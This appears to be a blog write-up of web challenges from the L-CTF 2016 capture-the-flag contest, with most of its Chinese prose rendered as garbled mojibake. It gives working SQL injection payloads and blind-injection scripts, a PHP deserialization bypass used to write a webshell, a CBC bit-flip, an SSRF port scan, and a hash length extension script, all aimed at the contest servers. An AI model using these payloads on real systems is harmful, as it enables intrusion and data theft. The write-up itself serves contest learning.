LoRexxar's Blog

L-ctf2016 Writeup

2016/10/03

鍦ㄥぇ瀹堕兘涓虹鍥芥瘝浜插簡鐢熺殑鏃跺欙紝澶╁ぉ閮芥湁浜洪棶鎴戯細浣犲共鍢涘憿锛熷嚭鏉ョ帺鍛鈥.鎴戣〃绀(鈺碘枴鈥)鈺傅鈹烩攣鈹伙紝绋嶅井鏈夌偣鍎块仐鎲剧殑鏄張鍒氬ソ閿欒繃浜嗗皬绀肩墿鐨勮竟缂樼嚎锛屽仛浜2閬撻珮鍒唚eb棰樿繕鎸哄紑蹇冪殑o(^鈻絕)鈹涳紝涓嶈繃xd鐨勬湇鍔″櫒涔熸槸铔帀瀹斥﹂棰橀兘瑕佺垎鐮磋繕娌℃庝箞宕╄繃鈥﹀己鏃犳晫鈥


WEB

web1 Can you get the flag

绋嶅井鐮旂┒涓嬶紝鍙戠幇鏄敞鍏

1
Password 锛' oorr (seleselectct/**/ sleep(100))#

鏄鹃敊娉ㄥ叆

1
payload: '/**/anandd/**/updaupdatexmltexml(0,concat(0x27,(seleselectct/**/version())),0)%23

娉ㄥ叆寰楀埌浜嗚处鍙峰拰瀵嗙爜

1
2
admin
we1c0me%_#2&_@LCTF

鐧婚檰涓婂幓鍙戠幇骞舵病鏈夌粨鏉燂紝浣嗘槸鍙戠幇濡傛灉flag涓鸿礋鐨勶紝閭d箞浼氭彁绀簆assword wrong锛岄偅涔堝氨璺戝惂

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Python璺
import requests
flag=0
for pwd in xrange(0,9999):
a=str(pwd)
b=a.zfill(4)
r=requests.post(
'http://web.l-ctf.com:6699/ret.php',
data={'selectNum': '-1', 'passwd': b , 'submit': 'Buy+It' },
)
response = unicode(r.content, 'utf-8')
if 'password wrong' not in response:
flag=1
print 'password is',b,response
break
elif(flag==0):
print 'trying',b
else:
break

寰楀埌瀵嗙爜
5487

1
flag is here: LCTF{Th1nks_@f0r_#your_%supp0rt}

鎴戞帶鍑犱笉涓绘垜鍙婂嚑鍟

璇村疄璇濓紝寮濮嬬炕浜嗙炕鎰熻waf澶粷浜嗏.浠涔堥兘鏈夎繃婊わ紝绠鐩存病娉曟敞锛岀湅鍒伴偅涔堝浜洪兘鍋氬嚭鏉ヤ簡锛岀洰娴嬫槸sqlmap锛岃窇涓璺戣繕鐪熺殑娉ㄥ埌浜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Database: xdctfweb150
Table: articles
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| auther | varchar(20) |
| content | text |
| id | int(2) |
| title | varchar(50) |
+---------+-------------+
Database: xdctfweb150
Table: where
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| secret | varchar(80) |
+--------+-------------+
Database: xdctfweb150
Table: where
[1 entry]
+--------------------------------+
| secret |
+--------------------------------+
| LCTF{H0w_D0_You_Bypass_My_w4f} |
+--------------------------------+

涓嶇煡閬撳仛鍑烘潵鐨勯偅涔堝浜烘湁澶氬皯鏄煡閬撴庝箞鍥炰簨鐨勩

浜嬪疄涓婏紝閭d釜琚玾af鎷︽埅鐨勮繑鍥炴槸鍦ㄦ煡璇箣鍚庣殑锛屾墍浠ュ嵆渚夸粬waf鎷︽埅浜嗚繑鍥烇紝鎴戜滑浠嶇劧鍙互鐢ㄦ椂闂寸洸娉ㄦ潵璺戞暟鎹紝sqlmap璺戜竴浼氬効灏卞嚭鏉ヤ簡

payload:

1
http://web.l-ctf.com:6699/LCTF150/?id=3%20AND%202362%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%3D0x7864637466776562313530%20LIMIT%200%2C1%29%2C3%2C1%29%29%3E54%29%2CSLEEP%283%29%2C2362%29

鐫¤繃浜

寮濮嬩竴鐩存病鎼炴槑鐧戒负鍟ユ槸杩欐牱锛屾庝箞鏀归兘娌$敤锛屽悗鏉ラ槦鍙嬫湁浜嗘濊矾锛岄鐩槸CVE-2016-7124鏀圭殑锛屽墠涓ゅぉ杩樻尯鏈夊悕鐨勪竴涓礊锛屽洜涓360鐨勬枃绔犳槸鏇茶В锛屾墍浠ユ垜褰卞搷杩樻尯娣辩殑銆

鍏蜂綋鍒嗘瀽璐翠釜闃熷弸鐨勫崥瀹㈠惂
http://lazysheep.cc/2016/09/13/0x22/

瀹炶瘽璇翠笉鐭ラ亾鎬庝箞瑙i噴锛岃创涓奼etshell鍚庢嬁鍒扮殑婧愮爜鍚

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<h1>杩欐槸涓涓悗闂(涓嶈繃濂藉儚涓嶈兘鐩存帴鐢ㄥ晩......</h1>
<hr />
<form action="" method='POST'>
Filename:<input type='text' name='filename' /><br/>
Filedata:<input type='text' name='filedata' /><br/>
<input type="submit" name='submit' />
</form>
<?php
class key{}
if($_POST['filename'] && $_POST['filedata']){
$key=new key();
$key->filename=$_POST['filename'];
$key->filedata=$_POST['filedata'];
$s=serialize($key);
echo "<meta http-equiv='refresh' content='0.1;url=upload.php?key=".$s."'>";
}
?>

杩欓噷灏辨槸涓涓畝鍗曠殑搴忓垪鍖栬繃绋

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
class key{
var $filename;
var $filedata;
function __wakeup(){
echo "Waking up.........<br/>";
foreach(get_object_vars($this) as $key=>$value){
$this->$key = null;
echo $key." => ".$this->$key;
echo "<br />";
}
echo "Finished<br/>";
echo "<br/>";
}
function __destruct(){
//Do something
$this->my_file_put_contents($this->filename,$this->filedata);
}
function my_file_put_contents($file_path,$data){
if($file_path && $data){
$rs=file_put_contents('./upload/'.md5($this->filename).'.php',$this->filedata);
echo $rs." written";
}
}
}
$key=$_GET['key'];
preg_match('/O:\d+:/',$key,$match);
if($match){
exit("鎹杩欑key鍔犱篃琛<br/>");
}
$Obj=unserialize($key);
?>

payload锛

1
http://web.l-ctf.com:10197/ctf/upload.php?key=O:%2b3:"key":3:{S:8:"filename";s:2:"ss";s:8:"filedata";s:19:"aaasdfasdfasdfasaaa";}

wakeup鏂规硶琚烦杩囦簡锛岄偅涔堝啓webshell杩涘幓

浣嗘槸杩涘幓鎴戜滑鍙堥亣鍒颁簡闂锛寃eb鐩綍涓嬫垜浠病鎵惧埌flag锛屾庝箞鍔炲憿

缁昽pendir鐨勯檺鍒讹紒锛

1
321=$f=[];$d=new DirectoryIterator("glob:///var/www/flag/*");var_dump($d);

鑻忔墦瀛﹀鐨勭綉绔

鑻忔墦瀛﹀寰堟枃鑹猴紝
鎼炰簡涓涓浘鐗囧皬绔欙紝浣嗘槸鏅哄晢缁忓父涓嶄笂绾裤備笉鐭ユ槸涓轰簡鏂逛究鍜嬬殑銆佺粡甯哥暀涓浜涘鎬殑涓滆タ涓嬫潵锛屾潵鍚э紝鐮镐簡浠栬繖涓浘鐗囩珯鐨勫満瀛愶紒锛
http://web.l-ctf.com:14144/

鍥犱负棰樹笉鏄垜鍋氱殑锛屾墍浠ユ垜灏辨寜鐓ч槦鍙嬫枃妗d腑鐨勬濊矾鏉ュ啓浜

棣栧厛鎴戜滑鍙戠幇

1
http://web.l-ctf.com:14144/img.php?id=file/5253d1eb29230.jpg 搴旇鏄矾寰勮В鏋愰棶棰橈紝瀛樺湪http://web.l-ctf.com:14144/file/tips.txt

浣嗘槸鎬庝箞閮借涓嶅埌锛屽悗鏉ュ彂鐜拌櫧鐒朵笉鐭ラ亾鍚庡彴鎬庝箞鍋氱殑澶勭悊锛屼絾鏄彲浠ュ弻绠¢亾寰楀埌鏂囦欢鍐呭锛屾垜鐚滄湁鍙兘鏄悗鍙板潗浜嗗墠缂妫鏌ワ紝payload

1
http://shimakaze.labs/lctf/parse.php?id=php://resource=file/5253d1eb29230.jpg/resource=file/tips.txt

璇讳簡tips.txt锛屽緱鍒

admin.php.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Admin.php.txt
<?php
error_reporting(0);
$Key = "xxxxxxxxxxxxxxxxx";
$iv = "xxxxxxxxxxxxxxxx";
$v = "2016niandiqijiequanguowangluoanquandasai0123456789abcdef-->xdctfxdnum=2015auid=4;xdctfxdctf";
$en_Result = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$Key, $v, MCRYPT_MODE_CBC, $iv);
$enc = base64_encode($en_Result);
$en_Data = base64_decode($_COOKIE[user]);
$de_Result = mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$Key, $en_Data, MCRYPT_MODE_CBC, $iv);
$b = array();
$b = isset($_COOKIE[user])?$de_Result:$enc;
$num1 = substr($b,strpos($b,"uid")+4,1);
$num2 = substr($b,strpos($b,"num")+4,4);
echo '</br><h3>ID: '.$num1."</h3><br>";
if ($num1 == 1 && $num2 == 2016){
die ("shen mi li wu !");
}
else{
echo "HELLO CLIENT";
}
setcookie("user",$enc);
?>%

img.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
if(isset($_GET["id"]) && (strpos($_GET["id"],'jpg') !== false))
{
preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($_GET["id"],'\n'), $match);
if (isset($match[1]))
$_GET["id"] = $match[1];
if (file_exists("./" . $_GET["id"]) == false)
die("File Not Found");
header('Content-Type: image/jpg');
header('Content-Length: '.filesize($_GET["id"]));
header('Content-Disposition: filename='.$_GET["id"]);
if (strlen($_GET["id"])>32){
die ("Too Long!!!!!");
}
else{
$data = file_get_contents($_GET["id"]);
echo $data;
}
}
else
{
echo "File Not Found";
}
?>

鎳傜殑浜虹湅涓鐪煎氨鑳芥槑鐧斤紝cbc瀛楄妭鍙嶈浆鏀诲嚮锛屽師鐞嗗氨涓嶅璇翠簡锛屼箣鍓嶄笁涓櫧甯介亣鍒拌繃锛宧ctf2015涔熸浘缁忓嚭杩

鏍稿績鍦ㄨ繖閲

1
2
3
$num1 = substr($b,strpos($b,"uid")+4,1);
$num2 = substr($b,strpos($b,"num")+4,4);

鍙鏋勯犲悗16浣嶄腑鐨13bytes涓簎id=1num=2016
灏卞彲浠ユ垚鍔熼氳繃鍒ゆ柇

璺戜竴璺戝氨濂戒簡锛岀劧鍚庡埌浜嗘枃浠朵笂浼

涓婁紶涓涓.user.ini

涓婁紶涓涓悓鍚嶆枃浠

get shell

1
2
3
http://web.l-ctf.com:14144/upload_12b1d89eb3a43eb6220b5952a5a13785/upload/index.php?a=assert
Post: fuckddog=phpinfo();

Headpic

杩欓鍩烘湰鍋氫簡鎴戜竴涓笅鍗堜竴涓櫄涓娾︽渶姘旂殑鏄繖棰樼殑绗竴绗簩姝ュ畬鍏ㄥ垎绂伙紝鎵浠ユ垜浠仛浜嗙浜屾鍚庯紝鍦╢lag鍓嶉潰绛変簡濂戒箙锛屼竴鐩村埌tips鏀句簡鎵嶅弽搴旇繃鏉ユ槸鍋氶敊浜嗛『搴忊﹀彧鍙儨鏈潵鏄兘鎷夸竴琛锛屾渶鍚庡牚鍫嬁涓3琛鈹(锟P 锟)鈹嶁

浜屾娉ㄥ叆

鐪嬪埌杩欎釜鎻愮ず鐨勬椂鍊欐垜涓鐩存槸钂欒斀鐨勶紝鍥犱负鍦ㄦ垜鐨勮鐐归噷锛岄鐩簲璇ユ槸ssrf鈥

浠旂粏鍒嗘瀽棰樼洰閫昏緫锛

娉ㄥ唽锛坕nsert锛->鐧婚檰(select)->鐧婚檰鍚庣粰涓涓ご鍍忓湴鍧锛堝瓨鍦紵select?杩樻槸娉ㄥ唽灏遍粯璁ゆ彃鍏ヤ簡锛->淇敼澶村儚锛坲pdate锛

鐭ラ亾鍋氬嚭鏉ユ垜閮戒笉鑳借偗瀹氭槸涓嶆槸瀛樺湪绗笁閮ㄥ垎锛屼絾鏄祴璇曞彂鐜扮鍥涙纭疄瀛樺湪锛岃屼笖update鏃剁殑where鏉′欢鏄痷sername = $user,杩欓噷瀛樺湪浜屾娉ㄥ叆銆

閭d箞闂鏉ヤ簡鈥﹁繖閲岀殑鍒ゆ柇鏉′欢蹇呴』璇锋眰淇敼鍚庣殑澶村儚鍐呭锛屾潵鍒ゆ柇鐩叉敞璇锋眰鏄惁鎴愬姛锛屼篃灏辨槸璇达紝姣忔娉ㄥ叆鎴戜滑閮藉繀椤昏姹4娆★紝杩樻槸鐩叉敞锛屽綋鐒惰繖閲岃繕鏈変釜闂灏辨槸楠岃瘉鐮佺殑闂

  • 缁曡繃楠岃瘉鐮

杩欓噷杩樻槸钃濈尗甯堝倕鎶簡鎴戜竴鎵嬶紝褰撴椂鎴戞鍦ㄧ爺绌剁粫杩囬獙璇佺爜鐨勶紝钃濈尗甯堝倕鍛婅瘔鎴戯紝濡傛灉浣犱笉甯ession鍘荤櫥闄嗘敞鍐岀殑璇濓紝楠岃瘉鐮佺殑鍒ゅ畾灏辨病鐢ㄤ簡銆

杩欓噷涔熷緢濂界悊瑙o紝涓鑸啓浠g爜鐨勪汉鍙冩护姝e父浜虹殑璇锋眰鏂瑰紡锛

浠g爜涓鑸暱杩欐牱

1
2
3
4
if(!isset($_SESSION)){
璁剧疆session锛
鐒跺悗璺冲洖
}

杩欐牱涓嶅甫鐫session鍘荤櫥闄嗘敞鍐屽氨鍙互浜嗐

涓嬮潰灏辨槸缂栧啓鑴氭湰鏃堕棿浜嗭紝鐢变簬鍜屽钩鏃剁殑鐩叉敞涓嶄竴鏍凤紝鎴戣嚜宸卞啓鐨勫伐鍏风敤涓嶄笂锛屾墍浠ユ病鍔炴硶锛屾垜鍙兘鑷繁鍙堝啓浜嗕竴涓剼鏈紝杩欐牱娌℃湁浜屽垎娉曪紝鎵浠ユ瘡娆′釜瀛楁瘝閮借100娆¤姹傦紝鎵浠ュ叏绋嬫敞鍏ラ兘鍦ㄥ彧鑳芥敼鑴氭湰锛岃烦杩囧悇绉嶅崟璇嶏紝杩樼畻鍙嬪ソ鐨勬槸骞舵病鏈変慨鏀逛竴浜涘崟璇嶏紝杩樺彲浠

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
import requests
from bs4 import BeautifulSoup
import base64
import Queue
import threading
def code(s):
url = "http://web.l-ctf.com:55533/verify.php"
cookies = {"PHPSESSID": "ljf888c57d6pd9qrcltgrsadd2"}
code = s.get(url, cookies=cookies)
with open("code.png", "wb") as ff:
ff.write(code.content)
img = Image.open("code.png")
code_string = pytesseract.image_to_string(img)
print code_string
def register(payload):
url1 = "http://web.l-ctf.com:55533/check.php"
data = {"user": payload, "pass": "dsa", "typer": "0", "register": "%E6%B3%A8%E5%86%8C"}
r = requests.post(url1,data = data)
def login(payload):
s = requests.Session()
url1 = "http://web.l-ctf.com:55533/check.php"
url2 = "http://web.l-ctf.com:55533/save.php"
url3 = "http://web.l-ctf.com:55533/ucenter.php"
data = {"user": payload, "pass": "dsa", "typer": "0", "login": "%E7%99%BB%E9%99%86"}
r = s.post(url1, data = data)
Session = r.headers['Set-Cookie']
data2 = {"headpic":"http://web.l-ctf.com:55533@115.28.78.16/ddog.php"}
r = s.post(url2, data = data2, cookies={"PHPSESSID": Session[10:-8]})
r = s.get(url3, cookies={"PHPSESSID": Session[10:-8]})
bs0bj = BeautifulSoup(r.text, "lxml")
content = base64.b64decode(bs0bj.img['src'][23:])
if len(content) > 0:
return True
else:
return False
def test(payload):
payload = payload.replace(" ", "/**/")
print payload
register(payload)
if login(payload):
return False
else:
return True
def ppayload():
# for i in xrange(30):
# payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.SCHEMATA limit 0,1)>" + str(i) + ")#"
# if test(payload):
# database_number = i
# break
# print "database_number:" + str(database_number)
database_number = 2
# for i in range(1,2):
# for j in xrange(50):
# payload = "nishigeshenmegui' or ((SELECT length(SCHEMA_NAME) from information_schema.SCHEMATA limit " + str(i) + ",1)>" + str(j) + ")#"
# if test(payload):
# database_length = j
# break
# print "[*]dababase_length: "+ str(database_length)
# database = ""
# for j in xrange(database_length):
# for r in xrange(7):
# pass
# for k in range(30,130):
# payload = "nishigeshenmegui' or ((select ascii(mid((SELECT SCHEMA_NAME from information_schema.SCHEMATA limit " + str(i) + ",1),"+ str(j) +",1)))>" + str(k) + ")#"
# if test(payload):
# database += chr(k)
# break
# print "[*]database:"+database
# for i in xrange(30):
# payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit 0,1)>" + str(i) + ")#"
# if test(payload):
# table_number = i
# break
# print "table_number:" + str(table_number)
# table_number = 2
# for i in range(0,table_number):
# # for j in xrange(50):
# payload = "nishigeshenmegui' or ((SELECT length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1)>" + str(j) + ")#"
# if test(payload):
# table_length = j
# break
# print "[*]table_length: "+ str(table_length)
# table_length = 14
# table = ""
# for j in range(11,table_length):
# for k in range(50,130):
# payload = "nishigeshenmegui' or ((select ascii(mid((SELECT TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
# if test(payload):
# table += chr(k)
# print table
# break
# # print "[*]table:" + table
# for i in xrange(30):
# payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' && TABLE_NAME = 'flag_admin_233' limit 0,1)>" + str(i) + ")#"
# if test(payload):
# conlum_number = i
# break
# conlum_number = 3
# print "conlum_number:" + str(conlum_number)
# for i in range(2,conlum_number):
# for j in xrange(50):
# if i == 2:
# conlum_length = 4
# break
# payload = "nishigeshenmegui' or ((SELECT length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1)>" + str(j) + ")#"
# if test(payload):
# conlum_length = j
# break
# print "[*]conlum_length: "+ str(conlum_length)
# column = ""
# for j in range(conlum_length):
# for k in range(90,130):
# payload = "nishigeshenmegui' or ((select ascii(mid((SELECT COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
# if test(payload):
# column += chr(k)
# print column
# break
# print "[*]column:" + column
# for i in xrange(30):
# payload = "nishigeshenmegui' or ((SELECT COUNT(*) from flag_admin_233 limit 0,1)>" + str(i) + ")#"
# if test(payload):
# content_number = i
# break
# print "content_number:" + str(content_number)
content_number = 1
number = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122]
for i in range(0,content_number):
# for j in xrange(50):
# payload = "nishigeshenmegui' or ((SELECT length(pass) from flag_admin_233 limit " + str(i) + ",1)>" + str(j) + ")#"
# if test(payload):
# content_length = j
# break
content_length =32
print "[*]content_length: "+ str(content_length)
content = ""
for j in range(content_length):
for k in number:
payload = "nishigeshenmegui' or ((select ascii(mid((SELECT pass from flag_admin_233 limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
if test(payload):
content += chr(k)
print content
break
print "[*]content:" + content
def main():
s = requests.Session()
# code(s)
ppayload()
if __name__ == '__main__':
main()

娉ㄥ叆寰楀埌

1
2
3
4
5
6
7
8
9
10
11
12
13
鏁版嵁搴撳悕web_200
琛ㄦ暟閲2
table
flag_admin_233
User
Flag_admin_233
Id锛 admin锛 pass
admin******
Admin锛1admin2016

ssrf

寰楀埌鐢ㄦ埛鍚嶅拰瀵嗙爜鍚庯紝鍙戠幇admin.php骞朵笉鑳界櫥闄嗕笂鍘伙紝鍐峳obots.txt鎴戜滑寰楀埌浜嗘彁绀

1
NEQGM33SM5SXIIDUN4QGIZLMMV2GKIDNPEQHAZLSONXW4YLMEBTGS3DFFR2GQYLUOMQHI33PEBRGCZBMNEQGI33OE52CA53BNZ2CA6LPOUQHI3ZAM5SXIIDTMVRXEZLUL5XGK527NZXXI2LDMUXHA2DQ

瑙ase32寰楀埌

1
"i forget to delete my personal file,thats too bad,i don't want you to get secret_new_notice.php"

鐩存帴璁块棶鍙戠幇鎻愮ず涓嶆槸鏈湴璁块棶锛岄偅涔堝氨鏄痵srf銆

娴嬭瘯淇敼鍙戠幇鏈夊墠缂妫鏌

澶村儚蹇呴』鏄http://web.l-ctf.com:55533寮澶寸殑锛屼絾鏄垜浠彲浠ョ敤@鏉ョ粫杩

褰撴椂绗竴鍙嶅簲鏄壂鍐呯綉绔彛锛屽鏋滃唴缃戞湁redis浠涔堢殑锛屽彲浠etshell

闄勪笂鎵唴缃戠鍙h剼鏈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
from bs4 import BeautifulSoup
import base64
urll = "http://web.l-ctf.com:55533@127.0.0.1:"
url1 = "http://web.l-ctf.com:55533/save.php"
url2 = "http://web.l-ctf.com:55533/ucenter.php"
cookie = {"PHPSESSID": "ljf888c57d6pd9qrcltgrsadd2"}
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Connection": "keep-alive"}
s = requests.Session()
# for i in range(22,65535):
data = {"headpic": urll + str("80")}
r = s.post(url1, data = data, cookies=cookie)
r = s.get(url2, headers=header, cookies=cookie)
bs0bj = BeautifulSoup(r.text, "lxml")
try:
content = base64.b64decode(bs0bj.img['src'][23:])
print content
except:
s = 1

寰楀埌鎻愮ず

1
i found that my account is too weak,so i make a trick,add something at the end of username<pre>$user=='admin******'?</pre>

瀹炶瘽璇磋繖閲屾槸鍏堝仛鍒扮殑锛屾墍浠ュ綋鏃剁涓鍙嶅簲鏄璺戣繖涓猘dmin锛屼簬鏄窇浜嗗ソ涔呰窇瀹岄兘娌¤窇鍒帮紝鐩存帴浼犳暟缁刧et flag

o(^鈻絕)鈹

浣犱竴瀹氫笉鑳芥潵杩

涓婃潵鍟ラ兘鎵句笉鍒帮紝娌″姙娉曟壂鐩綍锛屼簨瀹炶瘉鏄庯紝杩欓纭疄鏄壂鐩綍锛屾壂鍟婏紝鎵晩寰楀埌

1
http://web.l-ctf.com:33333/crossdomain.xml

寰楀埌

1
http://xdctfweb.xd-a8.com/

寰楀埌download.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
require("common.php");
function varify_hash($filename,$hash,$secret){
if(strpos($filename,"www.rar")>-1){
if($hash === md5($secret.$filename)){
download("www.rar");
}
else
exit("mac涓嶅锛屼綘鏍规湰涓嶆槸xdsec鐨勪汉銆") ;
}
elseif(strpos($filename,"download.php")>-1){
if($hash === md5($secret.$filename)){
download("download.php");
}
else
exit("mac涓嶅锛屼綘鏍规湰涓嶆槸xdsec鐨勪汉銆");
}
else
exit("娌℃湁浣犺涓嬭浇鐨勬枃浠躲");
}
$filename = urldecode($_GET['filename']);
$hash = $_GET['mac'];
if(!empty($filename) && !empty($hash)){
varify_hash($filename,$hash,$secret);
}
else
exit("鍙傛暟涓虹┖");
?>

鍙告満鍛婅瘔鎴戣繖鏄痟ash闀垮害鎷撳睍鏀诲嚮锛屾壘鍒颁竴涓伐鍏
http://www.cnblogs.com/pcat/p/5478509.html

鐢变簬涓嶇煡閬撳瘑閽ラ暱搴︼紝鐩存帴鍐欒剼鏈窇

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import hashpumpy
import urllib
import requests
url = "http://xdctfweb.xd-a8.com/download.php?filename=%s&mac=%s"
for x in xrange(52):
h, f = hashpumpy.hashpump("f30a38d3cdcb25cf067468c2f108e1f5", "download.php", "www.rar", x)
r = requests.get(url%(urllib.quote(f), h))
print x
print r.content
寰楀埌
Payload: http://xdctfweb.xd-a8.com/download.php?filename=download.php%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F0%00%00%00%00%00%00%00www.rar&mac=1f35a8fa0b3eedd9d25b5fe910ade0e7

涓嬭浇www.rar鍙戠幇鏈夊瘑鐮侊紝杩欐璁╂垜鎰熻闈炲父鍌婚尖﹀己琛屽姞misc锛屽氨鍜屽悗闈㈢殑web寮哄姞pwn涓鏍凤紝娌″暐鎰忎箟锛屽畨misc鐨勯昏緫锛宻trings涓涓嬪彂鐜颁簡涓嶅甯哥殑涓滆タ

1
2
3
Strings www.rar
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+$._$+(![]+"")[$._$_]+$.$$$_+"."+(![]+"")[$._$_]+$._$+"\\"+$.__$+$.$__+$.$$$+"(\\\"\\"+$.__$+$._$$+$.__$+$._$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.$__+"\\"+$.$__+$.___+"\\"+$.__$+$._$_+$._$$+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.__$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$._$$+$.__+$.$$$_+$.$$_$+"\\"+$.$__+$.___+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+$.$$$$+"\\"+$.$__+$.___+"\\"+$.__$+$._$$+$.__$+$._$+$._+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.$__+$.___+$.$$_$+$.$$$_+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.__$+$.$$$+$.$$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.$__+$.___+$.__+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.___+$.$_$+".\\\"\\"+$.$__+$.___+")"+"\"")())();

js鐨刯jencode
寰楀埌

1
YoU CAN gET Some INterESted Thing If You CAN deCOde Me In tImE.

鍩规牴瀵嗙爜锛屽簲璇ユ槸浠ュ墠鐨剎dctf鍑虹殑锛屾讳箣闈炲父鐪肩啛

1
XXDDCCTTFF

寰楀埌婧愮爜鍚庡彂鐜伴潪甯哥畝鍗曪紝浣嗘槸璁剧疆闈炲父鍌婚尖

鍏堢湅婧愮爜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>绠$悊鍛樺瘑鐮侀噸缃</title>
</head>
<center><h1>绠$悊鍛樺瘑鐮侀噸缃</h1></center></br></br></br>
<form action="" method="POST">
<center>
<label for="email">绠$悊鍛橀偖绠:</label>
<input type="textbox" name="email" /></br></br></br>
<input type="submit" name="submit" value="鎻愪氦" />
</center>
</form>
<?php
require('sql.php');
require('function.php');
if(!empty($_POST['email'])){
$email = $_POST['email'];
if($email === "omego952734@xdsec.club"){
$Time_check = verifyTime();
